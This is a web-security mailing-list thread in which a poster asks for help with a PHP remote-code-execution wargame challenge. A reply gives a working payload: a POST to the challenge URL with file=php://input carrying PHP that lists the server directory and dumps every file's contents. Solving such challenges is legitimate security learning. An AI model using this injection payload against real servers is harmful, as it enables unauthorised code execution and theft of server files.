Hello. I was told you guys might be able to help me out. I've been dared to complete this challenge and execute remote code on a server, but I'm stuck. Basically, here's what I know: http://pastebin.com/p89CGcrh In case you're wondering, this is not for malicious purposes, I'm simply learning by completing one of the challenges here: http://tasteless.phpnet.us/level_3.php I've been googling for hours but I'm completely stuck. The author told me I'm not allowed to use LFI nor RFI, I simply need to provide some php code with a GET or POST request and get it executed. I tried file=php://input along with <?php phpinfo(); ?> in a POST request done via a web proxy, and it worked when I removed the part of the script that appends .html to the string. I'm not sure how to remotely disable the part that appends .html, so that's basically what I'm looking for. %00 is blocked (i think? It's not working). Other than that, I'm looking for any other possible solutions to the problem as well, not just this php://input solution. I was hoping you guys would like a challenge ;-) Thanks for your time, Cris

HTTP POST to http://level3.tasteless.eu/?file=php://input executing: <?$d=dir(getcwd());echo"<pre>path:".$d- >path.PHP_EOL;while(($file=$d->read())!==false) {echo"filename:".$file.PHP_EOL.file_get_contents($file).PHP_EOL;}echo" </pre>";$d->close();?> Cris Noob <cloakbot <at> hotmail.com> writes: > > > Hello. I was told you guys might be able to help me out. I've been dared to complete this challenge and execute remote code on a server, but I'm stuck.Basically, here's what I know:http://pastebin.com/p89CGcrhIn case you're wondering, this is not for malicious purposes, I'm simply learning by completing one of the challenges here:http://tasteless.phpnet.us/level_3.phpI've been googling for hours but I'm completely stuck. The author told me I'm not allowed to use LFI nor RFI, I simply need to provide some php code with a GET or POST request and get it executed. I tried file=php://input along with <?php phpinfo(); ?> in a POST request done via a web proxy, and it worked when I removed the part of the script that appends .html to the string. I'm not sure how to remotely disable the part that appends .html, so that's basically what I'm looking for. %00 is blocked (i think? It's not working). Other than that, I'm looking for any other possible solutions to the problem as well, not just this php://input solution.I was hoping you guys would like a challenge Thanks for your time,Cris > > > _______________________________________________ > The Web Security Mailing List > > WebSecurity RSS Feed > http://www.webappsec.org/rss/websecurity.rss > > Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA > > WASC on Twitter > http://twitter.com/wascupdates > > websecurity <at> lists.webappsec.org > http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org >